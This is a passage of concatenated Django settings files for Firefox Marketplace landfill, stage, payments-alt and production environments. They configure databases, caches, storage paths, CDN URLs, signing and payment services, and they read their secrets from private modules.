MONOLITH_PASSWORD = private_mkt.MONOLITH_PASSWORD
# This is mainly for Marionette tests.
WEBAPP_MANIFEST_NAME = 'Marketplace Identity Stage'
ENABLE_API_ERROR_SERVICE = True
ES_USE_PLUGINS = True
########NEW FILE########
__FILENAME__ = settings_base
"""private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from lib.settings_base import CACHE_PREFIX, ES_INDEXES, KNOWN_PROXIES, LOGGING
from .. import splitstrip
import private_base as private
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['sa_pool_key'] = 'master'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave']['sa_pool_key'] = 'slave'
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 30
}
SLAVE_DATABASES = ['slave']
CACHES = {
'default': {
'BACKEND': 'caching.backends.memcached.MemcachedCache',
# 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
# 'BACKEND': 'memcachepool.cache.UMemcacheCache',
'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
'TIMEOUT': 500,
'KEY_PREFIX': CACHE_PREFIX,
},
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_ALWAYS_EAGER = True
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
HERA = []
LOGGING['loggers'].update({
'z.task': { 'level': logging.DEBUG },
'z.hera': { 'level': logging.INFO },
'z.redis': { 'level': logging.DEBUG },
'z.pool': { 'level': logging.ERROR },
})
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
'cache': private.REDIS_BACKENDS_CACHE,
'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
'master': private.REDIS_BACKENDS_MASTER,
'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' % RECAPTCHA_PUBLIC_KEY)
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'mkt-landfill'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
BUILDER_VERSIONS_URL = "https://builder-addons-dev.allizom.org/repackage/sdk-versions/"
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_landfill' % v) for k, v in ES_INDEXES.items())
BUILDER_UPGRADE_URL = "https://builder-addons-dev.allizom.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
KNOWN_PROXIES += ['10.2.83.105',
'10.2.83.106',
'10.2.83.107',
'10.8.83.200',
'10.8.83.201',
'10.8.83.202',
'10.8.83.203',
'10.8.83.204',
'10.8.83.210',
'10.8.83.211',
'10.8.83.212',
'10.8.83.213',
'10.8.83.214',
'10.8.83.215',
'10.8.83.251',
'10.8.83.252',
'10.8.83.253',
]
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
HEKA_CONF = {
'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin', {})},
'stream': {
'class': 'heka.streams.UdpStream',
'host': splitstrip(private.HEKA_CONF_SENDER_HOST),
'port': private.HEKA_CONF_SENDER_PORT,
},
}
USE_HEKA_FOR_CEF = True
USE_HEKA_FOR_TASTYPIE = True
ALLOW_SELF_REVIEWS = True
AES_KEYS = private.AES_KEYS
########NEW FILE########
__FILENAME__ = settings_mkt
"""private_mkt will be populated from puppet and placed in this directory"""
from lib.settings_base import *
from mkt.settings import *
from settings_base import *
import private_mkt
SERVER_EMAIL = '[email protected]'
DOMAIN = "landfill-mkt.allizom.org"
SITE_URL = 'https://landfill-mkt.allizom.org'
SERVICES_URL = SITE_URL
STATIC_URL = 'https://landfill-mkt-cdn.allizom.org/'
LOCAL_MIRROR_URL = '%s_files' % STATIC_URL
MIRROR_URL = LOCAL_MIRROR_URL
CSP_STATIC_URL = STATIC_URL[:-1]
CSP_IMG_SRC = CSP_IMG_SRC + (CSP_STATIC_URL,)
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + (CSP_STATIC_URL,)
CSP_STYLE_SRC = CSP_STYLE_SRC + (CSP_STATIC_URL,)
ADDON_ICON_URL = "%s/%s/%s/images/addon_icon/%%d-%%d.png?modified=%%s" % (STATIC_URL, LANGUAGE_CODE, DEFAULT_APP)
ADDON_ICON_URL = STATIC_URL + 'img/uploads/addon_icons/%s/%s-%s.png?modified=%s'
# --- CDN URL layout for user-uploaded media (landfill environment) ---
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
                         'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
                    'img/uploads/previews/full/%s/%d.%s?modified=%d')
# paths for uploaded extensions
FILES_URL = STATIC_URL + "%s/%s/downloads/file/%d/%s?src=%s"
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
# paths for uploaded extensions
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
# NOTE(review): STATIC_URL ends with '/' and this path starts with '/', so the
# resulting URL contains '//img' -- compare the prod variant which has no
# leading slash.  Confirm whether the double slash is intentional.
COLLECTION_ICON_URL = STATIC_URL + '/img/uploads/collection_icons/%s/%s.png?m=%s'
MEDIA_URL = STATIC_URL + 'media/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + 'img/hub'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
PRODUCT_ICON_URL = STATIC_URL + 'product-icons'
# --- Cache key namespacing: prefix is env-specific so landfill never shares
# --- cache entries with other deployments sharing the same memcached cluster.
CACHE_PREFIX = 'landfill.mkt.%s' % CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
CACHES['default']['KEY_PREFIX'] = CACHE_PREFIX
# --- Syslog / statsd identifiers for this environment ---
SYSLOG_TAG = "http_app_addons_marketplacelandfill"
SYSLOG_TAG2 = "http_app_addons_marketplacelandfill_timer"
SYSLOG_CSP = "http_app_addons_marketplacelandfill_csp"
STATSD_PREFIX = 'marketplace-landfill'
## Celery
BROKER_URL = private_mkt.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
# --- Web-app receipts and payments ---
WEBAPPS_RECEIPT_KEY = private_mkt.WEBAPPS_RECEIPT_KEY
WEBAPPS_RECEIPT_URL = private_mkt.WEBAPPS_RECEIPT_URL
APP_PREVIEW = True
WEBAPPS_UNIQUE_BY_DOMAIN = False
SENTRY_DSN = private_mkt.SENTRY_DSN
WEBAPPS_PUBLIC_KEY_DIRECTORY = NETAPP_STORAGE + '/public_keys'
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'
SOLITUDE_HOSTS = ('https://payments-dev.allizom.org',)
VALIDATOR_IAF_URLS = ['https://marketplace.firefox.com',
                      'https://marketplace.allizom.org',
                      'https://marketplace-dev.allizom.org',
                      'https://landfill-mkt.allizom.org']
# Add the debug pseudo-locale on top of the shared language list.
AMO_LANGUAGES = AMO_LANGUAGES + ('dbg',)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
BLUEVIA_SECRET = private_mkt.BLUEVIA_SECRET
#Bug 748403
SIGNING_SERVER = private_mkt.SIGNING_SERVER
SIGNING_SERVER_ACTIVE = True
SIGNING_VALID_ISSUERS = ['marketplace-dev-cdn.allizom.org']
#Bug 793876
SIGNED_APPS_KEY = private_mkt.SIGNED_APPS_KEY
# App signing is disabled in landfill (contrast: enabled on stage/prod).
SIGNED_APPS_SERVER_ACTIVE = False
# Heka logging client: reuse the inherited HEKA_CONF, pointing it at this
# environment's logger name and adding the raven (Sentry) plugin.
HEKA_CONF['logger'] = 'addons-marketplace-landfill'
HEKA_CONF['plugins']['raven'] = ('heka_raven.raven_plugin:config_plugin', {'dsn': private_mkt.SENTRY_DSN})
HEKA = client_from_dict_config(HEKA_CONF)
########NEW FILE########
__FILENAME__ = settings_base
"""private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from lib.settings_base import (ALLOWED_HOSTS, CACHE_PREFIX, ES_INDEXES,
                               KNOWN_PROXIES, LOGGING, HOSTNAME)
from .. import splitstrip
import private_base as private
ALLOWED_HOSTS += ['.mozflare.net']
# Non-production environment: keep crawlers out.
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
# --- Databases: master ('default') + read slave, both via a pooled MySQL
# --- engine; credentials come from the puppet-provisioned private module.
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
DATABASE_POOL_ARGS = {
    'max_overflow': 10,
    'pool_size': 5,
    'recycle': 30
}
SLAVE_DATABASES = ['slave']
CACHES = {
    'default': {
        'BACKEND': 'caching.backends.memcached.MemcachedCache',
        'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
        'TIMEOUT': 500,
        'KEY_PREFIX': CACHE_PREFIX,
    },
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
# --- Shared NetApp filesystem layout for uploads and generated files ---
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
HERA = []
LOGGING['loggers'].update({
    'z.task': {'level': logging.DEBUG},
    'z.hera': {'level': logging.INFO},
    'z.redis': {'level': logging.DEBUG},
    'z.pool': {'level': logging.ERROR},
})
# --- Redis backends (cache + master/slave pairs) from the private module ---
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
    'cache': private.REDIS_BACKENDS_CACHE,
    'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
    'master': private.REDIS_BACKENDS_MASTER,
    'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' % RECAPTCHA_PUBLIC_KEY)
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'marketplace-stage'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
BUILDER_VERSIONS_URL = "https://builder-addons.allizom.org/repackage/sdk-versions/"
GOOGLE_ANALYTICS_CREDENTIALS = private.GOOGLE_ANALYTICS_CREDENTIALS
GOOGLE_API_CREDENTIALS = private.GOOGLE_API_CREDENTIALS
# --- Elasticsearch: host list from puppet; indexes get a '_stage' suffix so
# --- this environment never writes into prod indexes.
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_stage' % v) for k, v in ES_INDEXES.items())
BUILDER_UPGRADE_URL = "https://builder-addons.allizom.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
# Load-balancer / proxy IPs whose X-Forwarded-For headers are trusted.
KNOWN_PROXIES += ['10.2.83.105',
                  '10.2.83.106',
                  '10.2.83.107',
                  '10.8.83.200',
                  '10.8.83.201',
                  '10.8.83.202',
                  '10.8.83.203',
                  '10.8.83.204',
                  '10.8.83.210',
                  '10.8.83.211',
                  '10.8.83.212',
                  '10.8.83.213',
                  '10.8.83.214',
                  '10.8.83.215',
                  '10.8.83.251',
                  '10.8.83.252',
                  '10.8.83.253',
                  ]
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
MONOLITH_SERVER = 'https://monolith.allizom.org'
GEOIP_URL = 'http://geo.marketplace.allizom.org'
API_THROTTLE = False
# New Relic is off in this variant (the stage variant gates it on HOSTNAME).
NEWRELIC_ENABLE = False
AES_KEYS = private.AES_KEYS
########NEW FILE########
__FILENAME__ = settings_mkt
"""private_mkt will be populated from puppet and placed in this directory"""
from lib.settings_base import *
from mkt.settings import *
from settings_base import *
import private_mkt
SERVER_EMAIL = '[email protected]'
# payments-alt environment: domain, site URL and CDN for static assets.
DOMAIN = "payments-alt.allizom.org"
SITE_URL = 'https://%s' % DOMAIN
SERVICES_URL = SITE_URL
STATIC_URL = os.getenv('CUSTOM_CDN', 'https://payments-alt-cdn.allizom.org/')
LOCAL_MIRROR_URL = '%s_files' % STATIC_URL
MIRROR_URL = LOCAL_MIRROR_URL
# CSP sources use the CDN host without the trailing slash.
CSP_STATIC_URL = STATIC_URL[:-1]
CSP_IMG_SRC = CSP_IMG_SRC + (CSP_STATIC_URL,)
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + (CSP_STATIC_URL,)
CSP_STYLE_SRC = CSP_STYLE_SRC + (CSP_STATIC_URL,)
# Icon URLs for uploaded add-on icons, served from the CDN.
# NOTE(review): a second, older ADDON_ICON_URL assignment used to precede this
# one ("%s/%s/%s/images/addon_icon/..." built from LANGUAGE_CODE/DEFAULT_APP);
# it was dead code, immediately overwritten by the line below, so it has been
# removed.  The uploads-based URL below is the only value that ever took effect.
ADDON_ICON_URL = STATIC_URL + 'img/uploads/addon_icons/%s/%s-%s.png?modified=%s'
# --- CDN URL layout for user-uploaded media (payments-alt environment) ---
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
                         'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
                    'img/uploads/previews/full/%s/%d.%s?modified=%d')
# paths for uploaded extensions
FILES_URL = STATIC_URL + "%s/%s/downloads/file/%d/%s?src=%s"
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
# paths for uploaded extensions
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
# NOTE(review): STATIC_URL ends with '/' and this path starts with '/', giving
# a '//img' double slash in the URL; the prod variant omits the leading slash.
# Confirm which form is intended before normalizing.
COLLECTION_ICON_URL = STATIC_URL + '/img/uploads/collection_icons/%s/%s.png?m=%s'
MEDIA_URL = STATIC_URL + 'media/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + 'img/hub'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
PRODUCT_ICON_URL = STATIC_URL + 'product-icons'
# Env-specific cache key prefix so memcached entries don't collide across
# deployments.
CACHE_PREFIX = 'stage.mkt.%s' % CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
CACHES['default']['KEY_PREFIX'] = CACHE_PREFIX
LOG_LEVEL = logging.DEBUG
# The django statsd client to use, see django-statsd for more.
#STATSD_CLIENT = 'django_statsd.clients.moz_heka'
SYSLOG_TAG = "http_app_addons_marketplace_altpay"
SYSLOG_TAG2 = "http_app_addons_marketplacestage_timer"
SYSLOG_CSP = "http_app_addons_marketplacestage_csp"
STATSD_PREFIX = 'marketplace-stage'
## Celery
BROKER_URL = private_mkt.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
# --- Web-app receipts and payments (solitude is the payments backend) ---
WEBAPPS_RECEIPT_KEY = private_mkt.WEBAPPS_RECEIPT_KEY
WEBAPPS_RECEIPT_URL = private_mkt.WEBAPPS_RECEIPT_URL
APP_PREVIEW = True
WEBAPPS_UNIQUE_BY_DOMAIN = True
SENTRY_DSN = private_mkt.SENTRY_DSN
SOLITUDE_HOSTS = ('https://payments-alt-solitude.allizom.org',)
SOLITUDE_OAUTH = {'key': private_mkt.SOLITUDE_OAUTH_KEY,
                  'secret': private_mkt.SOLITUDE_OAUTH_SECRET}
WEBAPPS_PUBLIC_KEY_DIRECTORY = NETAPP_STORAGE + '/public_keys'
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'
DUMPED_APPS_PATH = NETAPP_STORAGE + '/dumped-apps'
DUMPED_USERS_PATH = NETAPP_STORAGE + '/dumped-users'
GOOGLE_ANALYTICS_DOMAIN = 'marketplace.firefox.com'
VALIDATOR_IAF_URLS = ['https://marketplace.firefox.com',
                      'https://marketplace.allizom.org',
                      'https://payments-alt.allizom.org',
                      'https://marketplace-dev.allizom.org',
                      'https://marketplace-altdev.allizom.org']
if getattr(private_mkt, 'LOAD_TESTING', False):
    # mock the authentication and use django_fakeauth for this
    AUTHENTICATION_BACKENDS = ('django_fakeauth.FakeAuthBackend',)\
                              + AUTHENTICATION_BACKENDS
    MIDDLEWARE_CLASSES.insert(
        MIDDLEWARE_CLASSES.index('access.middleware.ACLMiddleware'),
        'django_fakeauth.FakeAuthMiddleware')
    FAKEAUTH_TOKEN = private_mkt.FAKEAUTH_TOKEN
    # we are also creating access tokens for OAuth, here are the keys and
    # secrets used for them
    API_PASSWORD = getattr(private_mkt, 'API_PASSWORD', FAKEAUTH_TOKEN)
# Add the debug pseudo-locale on top of the shared language list.
AMO_LANGUAGES = AMO_LANGUAGES + ('dbg',)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
BLUEVIA_SECRET = private_mkt.BLUEVIA_SECRET
#Bug 748403
SIGNING_SERVER = private_mkt.SIGNING_SERVER
SIGNING_SERVER_ACTIVE = True
SIGNING_VALID_ISSUERS = [DOMAIN]
#Bug 793876
SIGNED_APPS_KEY = private_mkt.SIGNED_APPS_KEY
SIGNED_APPS_SERVER_ACTIVE = True
SIGNED_APPS_SERVER = private_mkt.SIGNED_APPS_SERVER
SIGNED_APPS_REVIEWER_SERVER_ACTIVE = True
SIGNED_APPS_REVIEWER_SERVER = private_mkt.SIGNED_APPS_REVIEWER_SERVER
# Heka logging client: CEF via syslog plugin, shipped over UDP.
HEKA_CONF = {
    'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin', {
        'syslog_facility': 'LOCAL4',
        # CEF_PRODUCT is defined in settings_base
        'syslog_ident': CEF_PRODUCT,
        'syslog_priority': 'INFO'
        }),
    },
    'stream': {
        'class': 'heka.streams.UdpStream',
        'host': splitstrip(private.HEKA_CONF_SENDER_HOST),
        'port': private.HEKA_CONF_SENDER_PORT,
    },
    'logger': 'addons-marketplace-stage',
}
HEKA = client_from_dict_config(HEKA_CONF)
USE_HEKA_FOR_CEF = True
# See mkt/settings.py for more info.
APP_PURCHASE_KEY = DOMAIN
APP_PURCHASE_AUD = DOMAIN
APP_PURCHASE_TYP = 'mozilla-alt/payments/pay/v1'
APP_PURCHASE_SECRET = private_mkt.APP_PURCHASE_SECRET
MONOLITH_PASSWORD = private_mkt.MONOLITH_PASSWORD
# This is mainly for Marionette tests.
WEBAPP_MANIFEST_NAME = 'Marketplace Stage'
ENABLE_API_ERROR_SERVICE = True
NEWRELIC_INI = None
ES_USE_PLUGINS = True
BANGO_BASE_PORTAL_URL = 'https://mozilla.bango.com/login/al.aspx?'
MONOLITH_INDEX = 'mktstage-time_*'
# IARC content ratings.
IARC_ENV = 'test'
IARC_MOCK = False
IARC_PASSWORD = private_mkt.IARC_PASSWORD
IARC_PLATFORM = 'Firefox'
IARC_SERVICE_ENDPOINT = 'https://www.globalratings.com/IARCDEMOService/IARCServices.svc'
IARC_STOREFRONT_ID = 4
IARC_SUBMISSION_ENDPOINT = 'https://www.globalratings.com/IARCDEMORating/Submission.aspx'
IARC_ALLOW_CERT_REUSE = True
PRE_GENERATE_APKS = False
PRE_GENERATE_APK_URL = \
    'https://apk-controller.stage.mozaws.net/application.apk'
# Bug 1002569.
PAYMENT_PROVIDERS = ['bango', 'boku']
DEFAULT_PAYMENT_PROVIDER = 'bango'
########NEW FILE########
__FILENAME__ = settings_base
import logging
import os
import dj_database_url
from lib.settings_base import CACHE_PREFIX, KNOWN_PROXIES, LOGGING, HOSTNAME
from .. import splitstrip
import private_base as private
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
# Production: really deliver mail and allow crawlers.
SEND_REAL_EMAIL = True
ENGAGE_ROBOTS = True
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
# --- Databases: master ('default') + read slave via pooled MySQL engine ---
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASE_POOL_ARGS = {
    'max_overflow': 10,
    'pool_size': 5,
    'recycle': 300
}
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
SLAVE_DATABASES = ['slave']
CACHES = {
    'default': {
        'BACKEND': 'caching.backends.memcached.MemcachedCache',
        'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
        'TIMEOUT': 500,
        'KEY_PREFIX': CACHE_PREFIX,
    },
}
## Celery
BROKER_URL = private.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
BROKER_CONNECTION_TIMEOUT = 0.1
# --- Shared NetApp filesystem layout for uploads and generated files ---
NETAPP_STORAGE_ROOT = private.NETAPP_STORAGE_ROOT
NETAPP_STORAGE = NETAPP_STORAGE_ROOT + '/shared_storage'
GUARDED_ADDONS_PATH = NETAPP_STORAGE_ROOT + '/guarded-addons'
MIRROR_STAGE_PATH = NETAPP_STORAGE_ROOT + '/public-staging'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
# NOTE(review): hard-codes '.png' here, while the settings_mkt overlay later
# redefines it with a '%s' extension placeholder -- the overlay wins.
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.png'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
HERA = []
LOG_LEVEL = logging.DEBUG
LOGGING['loggers'].update({
    'amqp': {'level': logging.WARNING},
    'raven': {'level': logging.WARNING},
    'requests': {'level': logging.WARNING},
    'z.addons': {'level': logging.INFO},
    'z.task': {'level': logging.DEBUG},
    'z.hera': {'level': logging.INFO},
    'z.redis': {'level': logging.DEBUG},
    'z.pool': {'level': logging.ERROR},
})
# --- Redis backends (cache + master/slave pairs) from the private module ---
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
    'cache': REDIS_BACKEND,
    'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
    'master': private.REDIS_BACKENDS_MASTER,
    'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' % RECAPTCHA_PUBLIC_KEY)
